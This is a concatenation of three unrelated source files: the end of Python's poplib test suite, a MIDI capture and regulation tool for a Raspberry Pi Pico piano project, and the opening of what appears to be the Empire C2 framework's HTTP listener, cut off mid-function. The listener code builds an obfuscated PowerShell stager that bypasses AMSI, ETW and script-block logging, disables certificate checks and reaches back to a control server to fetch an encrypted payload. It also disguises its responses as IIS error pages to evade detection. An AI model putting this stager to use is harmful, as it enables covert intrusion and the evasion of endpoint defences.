tls_sock = context.wrap_socket(self.socket,
server_side=True,
do_handshake_on_connect=False,
suppress_ragged_eofs=False)
self.del_channel()
self.set_socket(tls_sock)
self.tls_active = True
self.tls_starting = True
self.in_buffer = []
self._do_tls_handshake()
else:
self.push('-ERR Command not permitted when TLS active')
def _do_tls_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self.tls_active = True
self.tls_starting = False
def handle_read(self):
if self.tls_starting:
self._do_tls_handshake()
else:
try:
asynchat.async_chat.handle_read(self)
except ssl.SSLEOFError:
self.handle_close()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_utf8_raises_if_unsupported(self):
self.server.handler.enable_UTF8 = False
self.assertRaises(poplib.error_proto, self.client.utf8)
def test_utf8(self):
self.server.handler.enable_UTF8 = True
expected = b'+OK I know RFC6856'
result = self.client.utf8()
self.assertEqual(result, expected)
def test_capa(self):
capa = self.client.capa()
self.assertTrue('IMPLEMENTATION' in capa.keys())
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
@requires_ssl
def test_stls_capa(self):
capa = self.client.capa()
self.assertTrue('STLS' in capa.keys())
@requires_ssl
def test_stls(self):
expected = b'+OK Begin TLS negotiation'
resp = self.client.stls()
self.assertEqual(resp, expected)
@requires_ssl
def test_stls_context(self):
expected = b'+OK Begin TLS negotiation'
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CAFILE)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
with self.assertRaises(ssl.CertificateError):
resp = self.client.stls(context=ctx)
self.client = poplib.POP3("localhost", self.server.port, timeout=3)
resp = self.client.stls(context=ctx)
self.assertEqual(resp, expected)
if SUPPORTS_SSL:
from test.test_ftplib import SSLConnection
class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.secure_connection()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = True
self.tls_starting = False
@requires_ssl
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse('STLS' in capa.keys())
@requires_ssl
class TestPOP3_TLSClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3.stls()
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
self.client.stls()
def tearDown(self):
if self.client.file is not None and self.client.sock is not None:
try:
self.client.quit()
except poplib.error_proto:
# happens in the test_too_long_lines case; the overlong
# response will be treated as response to QUIT and raise
# this exception
self.client.close()
self.server.stop()
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse(b'STLS' in capa.keys())
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(pop.sock.gettimeout())
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def test_main():
tests = [TestPOP3Class, TestTimeouts,
TestPOP3_SSLClass, TestPOP3_TLSClass]
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
__init__.py
|
#!/usr/bin/env python3
import mido
from mido import Message, MidiFile, MidiTrack
from dissect.cstruct import cstruct
import threading
import time
import sys
import bz2
import statistics
from collections import defaultdict
pico_in = mido.get_input_names()[1] # NOQA -- I like this indentation better
pico_out = mido.get_output_names()[1]
c=cstruct()
with open('../RaspberryPiPico/My_MIDI_constants.h') as f:
c.load(f.read())
midi_strings = c.consts
midi_values = {}
for k in midi_strings.keys():
value = midi_strings[k]
if value in midi_values:
print("Warning, duplicated value", value, "for", midi_values[value], "and", k, file=sys.stderr)
midi_values[midi_strings[k]] = k
print(midi_strings)
print(midi_values)
class mt:
def _previous_not_NA(self, mylist):
previous = "N/A"
i = 0
while (previous == "N/A"):
i = i + 1
previous = mylist[-i] if (len(mylist) > i - 1) else 0
return previous
def _count_missing(self, all_packets):
n_missing_packets = all_packets.count("N/A")
n_present_packets = len(all_packets) - n_missing_packets
return n_missing_packets, n_present_packets
def parse_stats(self, filename, quiet=False):
adc_packets = defaultdict(lambda: list())
rtc_packets = []
n_junk_packets = 0
iter_per_ms = defaultdict(lambda: list())
n_overflow_iter_per_ms = defaultdict(lambda: 0)
roundtrip_time = []
notes_on = defaultdict(lambda: 0)
velocities_on = defaultdict(lambda: 0)
notes_off = defaultdict(lambda: 0)
velocities_off = defaultdict(lambda: 0)
if not quiet: print() # NOQA -- simple and clear enough
previous_packet = None # Check if ADC and RTC packets alternate
for msg in MidiFile(file=bz2.open(filename, 'rb')).play():
if msg.type == 'note_on':
notes_on[msg.note] += 1
velocities_on[msg.note] += msg.velocity
continue
if msg.type == 'note_off':
notes_off[msg.note] += 1
velocities_off[msg.note] += msg.velocity
continue
if msg.type != 'sysex':
print("Warning, not dealing with", msg.type, file=sys.stderr)
continue
try:
if msg.data[0] != defined.MIDI_VENDOR:
print("Warning, probable message corruption", msg, file=sys.stderr)
continue
if msg.data[1] > defined.MIDI_MAX_ADC_VALUE:
if msg.data[1] == defined.MIDI_RTC:
curr_time = (msg.data[2] * 128 + msg.data[3]) / 1000000 # us
old_time = self._previous_not_NA(rtc_packets)
while (curr_time < old_time):
curr_time += 16384 / 1000000 # us
rtc_packets.append(curr_time)
if previous_packet == defined.MIDI_RTC:
# TODO make sure N_ADC packets not just one
for key in adc_packets:
adc_packets[key].append("N/A")
previous_packet = defined.MIDI_RTC
elif msg.data[1] == defined.MIDI_ITER_PER_MS:
if msg.data[2] == msg.data[3] and msg.data[2] == 127:
n_junk_packets += 1
continue
if msg.data[3] == 127:
n_overflow_iter_per_ms[msg.data[2]] += 1
continue
iter_per_ms[msg.data[2]].append(msg.data[3])
elif msg.data[1] == defined.MIDI_ROUNDTRIP_TIME_uS:
roundtrip_time.append(msg.data[2] * 128 + msg.data[3])
# MIDI_REGULATE
# MIDI_CONTINUE_REGULATION
# MIDI_DUMP_REGULATION
# INIT_PICO
# MIDI_NO_SUCH_NOTE
# MIDI_ERROR
# TOO_MANY_PICOS
# EXPECTING_INIT
# TOO_MANY_PACKETS
else:
print("Warning, not counting ", end="", file=sys.stderr)
self.pretty_print(msg.data, target=sys.stderr)
else:
if previous_packet == defined.MIDI_MAX_ADC_VALUE:
# TODO count up to N_ADC packets to save b/w
rtc_packets.append("N/A")
adc_packets[msg.data[3]].append(msg.data[1] * 128 + msg.data[2])
previous_packet = defined.MIDI_MAX_ADC_VALUE
except IndexError:
print("Warning, corrupted packet ", end="", file=sys.stderr)
self.pretty_print(msg.data, target=sys.stderr)
if not quiet:
n_adc_missing_packets = 0
n_adc_present_packets = 0
for i in adc_packets:
miss, pres = self._count_missing(adc_packets[i])
n_adc_missing_packets += miss
n_adc_present_packets += pres
n_rtc_missing_packets, n_rtc_present_packets = self._count_missing(rtc_packets)
print()
print("Number of ADC dump packets", n_adc_present_packets)
print("Number of known ADC missing packets", n_adc_missing_packets)
print("Number of MIDI_RTC packets", n_rtc_present_packets)
print("Number of known MIDI_RTC missing packets", n_rtc_missing_packets)
print("Number of startup packets", n_junk_packets)
for pico in iter_per_ms:
if len(iter_per_ms[pico]) > 0:
avg = statistics.mean(iter_per_ms[pico])
std = statistics.stdev(iter_per_ms[pico])
else:
avg = "N/A"
std = "N/A"
print("ITER_PER_MS for pico #", pico, " avg:", avg, "stdev:", std, "(over", len(iter_per_ms[pico]), "messages)")
if len(iter_per_ms) == 0:
print("No ITER_PER_MS packets")
for pico in n_overflow_iter_per_ms:
print("Number of overflow ITER_PER_MS packets for pico #", pico, "is", n_overflow_iter_per_ms[pico])
if len(roundtrip_time) > 0:
avg = statistics.mean(roundtrip_time)
std = statistics.stdev(roundtrip_time)
else:
avg = "N/A"
std = "N/A"
print("MIDI_ROUNDTRIP_TIME_uS. avg:", avg, "stdev:", std, "(over", len(roundtrip_time), "messages)")
print("NOTE_ON", dict(notes_on))
for v in velocities_on:
velocities_on[v] /= notes_on[v]
print("VELOCITY_ON", dict(velocities_on))
print("NOTE_OFF", dict(notes_off))
for v in velocities_off:
velocities_off[v] /= notes_off[v]
print("VELOCITY_OFF", dict(velocities_off))
return rtc_packets, adc_packets
def pretty_print(self, data, exclude=[], target=sys.stdout):
my_midi_strings = list(midi_strings.keys())
for e in exclude:
my_midi_strings.remove(e)
if data[1] in midi_values:
if midi_values[data[1]] in my_midi_strings:
print(midi_values[data[1]], data[2], data[3], file=target)
else:
print(data[1], data[2], data[3], file=target)
def _print_info(self):
print("Run `mt.save_captured(file)` to stop capturing and save.")
print("Run `mt.abort_capture()` to stop capturing.")
def __init__(self):
self.th = None
self.term = None
self.outport = mido.open_output(pico_out)
print("Opened", pico_out, "for output", file=sys.stderr)
self.must_stop = True
self.mid = None
self.track = None
def _print_above(self, stuff):
try:
if self.term is None:
import blessed
self.term = blessed.Terminal()
with self.term.location(self.term.width - len(stuff) - 1, 0):
print(stuff, end=None)
except ModuleNotFoundError:
pass
def _capture(self, pico):
with mido.open_input(pico) as inport:
print(pico, "opened, collecting messages.", file=sys.stderr)
self._print_info()
last_time = 0
options = ["|", "/", "-", "\\"]
i = 0
self._print_above(options[i])
for msg in inport:
self.track.append(msg)
curr_time = time.time()
if (curr_time - last_time > .25):
i = (i+1) % len(options)
self._print_above(options[i]) # TODO print MIDI housekeeping
curr_time = last_time
if self.must_stop:
break
print("Capture stopped")
def abort_capture(self):
self.must_stop = True
print("Waiting for last packet to quit")
self.th.join()
def capture(self, pico=pico_in):
self.mid = MidiFile()
self.must_stop = False
self.track = MidiTrack()
self.mid.tracks.append(self.track)
self.th = threading.Thread(target=mt._capture, args=(self, pico) ) # NOQA space makes it clearer
self.th.start()
time.sleep(1) # let the _print_above win the race condition agains the prompt
def save_captured(self, filename):
if type(filename) != str:
raise ValueError("first argument must be a string")
self.must_stop = True
self.mid.save(filename)
print("File saved, waiting for last packet")
self.th.join()
def adc_dump(self, note):
if (self.must_stop):
print("Dumping but not capturing")
print("Run `mt.capture()` to capture.")
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_DUMP_NOTE_ADC,
note,
0, 0, 0)))
def stop_adc_dump(self):
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_STOP_DUMP_ADC,
0, 0, 0, 0)))
if (not self.must_stop):
print("Stopped dumpting but still capturing")
self._print_info()
def _validate_integer(self, a):
if a < 0 or a > 4095:
raise ValueError("Let off, Strike and Drop must be 0-4095")
if a != int(a):
raise ValueError("Let off, Strike and Drop must be integers")
def _validate_float(self, a):
if a < 0 or a > 255:
raise ValueError("Velocities must be 0-255")
def _int_regulation_with(self, a, verbose):
first = int(a / 127)
second = a % 127
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_CONTINUE_REGULATION,
first,
second,
0, 0)))
if verbose:
print("Regulating with",
"0x{:02x}".format(first),
"0x{:02x}".format(second),
"==", first, second)
def _float_regulation_with(self, a, verbose):
first = int(a)
second = int( (a - int(a)) * 100 ) # NOQA spaces make it clearer
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_CONTINUE_REGULATION,
first,
second,
0, 0)))
if verbose:
print("Regulating with",
"0x{:02x}".format(first),
"0x{:02x}".format(second),
"==", first, second)
def regulate(self, note, let_off=0, strike=0, drop=0,
vel_const=0, vel_slope=0, verbose=True):
self._validate_integer(let_off)
self._validate_integer(strike)
self._validate_integer(drop)
self._validate_float(vel_const)
self._validate_float(vel_slope)
self.outport.send(Message('sysex', data=(
defined.MIDI_VENDOR,
defined.MIDI_REGULATE,
note,
0, 0, 0)))
self._int_regulation_with(let_off, verbose)
self._int_regulation_with(strike, verbose)
self._int_regulation_with(drop, verbose)
self._float_regulation_with(vel_const, verbose)
self._float_regulation_with(vel_slope, verbose)
self._int_regulation_with(let_off, verbose) # dummy to close the regulation
|
http.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# check if the current session cookie not empty and then generate random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
